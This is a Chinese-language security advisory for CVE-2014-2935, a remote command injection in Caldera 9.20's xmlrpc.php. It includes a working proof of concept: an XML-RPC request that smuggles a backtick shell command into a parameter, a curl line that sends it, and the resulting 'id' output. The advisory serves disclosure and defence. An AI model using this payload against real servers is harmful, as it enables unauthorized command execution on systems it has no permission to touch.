Caldera 'xmlrpc.php'远程命令注入漏洞

发布日期:2014-05-07
更新日期:2014-05-10

受影响系统:
Caldera Caldera 9.20
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 67252
 CVE(CAN) ID: CVE-2014-2935
 
Caldera是RIP软件、色彩管理软件、工作流软件。
 
Caldera 9.20及更早版本没有正确删除OS命令内使用的某些元素, '/costview3/xmlrpc_server/xmlrpc.php' 脚本存在命令执行漏洞,未经身份验证的远程用户提交特制的PHP XMLRPC请求即可触发此漏洞,导致执行OS命令。
 
<*来源:Thomas Fischer
        Markus Wulftange
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Example:
 $ cat get_cutter_tools.xml
 <?phpxml version="1.0"?>
 <methodCall>
 <methodName>xmlrpc.get_cutter_tools_xmlrpc</methodName>
 <params>
 <param><value><string>cutter_name</string></value></param>
 <param><value><string>; echo
"&lt;CalderaInfo>&lt;methods>&lt;item>&lt;type>`id`&lt;/type>&lt;/item>&lt;/methods>&lt;/CalderaInfo
 >"</string></value></param>
 </params>
 </methodCall>
 $ curl --data @get_cutter_tools.xml <host>/costview3/xmlrpc_server/xmlrpc.php
 <?phpxml version="1.0"?>
 <methodResponse>
 <params>
 <param>
 <value><struct>
 <member><name>get_cutter_tools_xmlrpc</name>
 <value><array>
 <data>
 <value><string>uid=1002(caldera) gid=1001(caldera)
groups=1001(caldera),4(adm),7(lp),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),46(plugdev),103
 (fuse),104(scanner),109(netdev)</string></value>
 </data>
 </array></value>
 </member>
 </struct></value>
 </param>
 </params>
 </methodResponse>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Caldera
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

 

 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/b1b32cdc71dde23bc6f8c1e450160449.html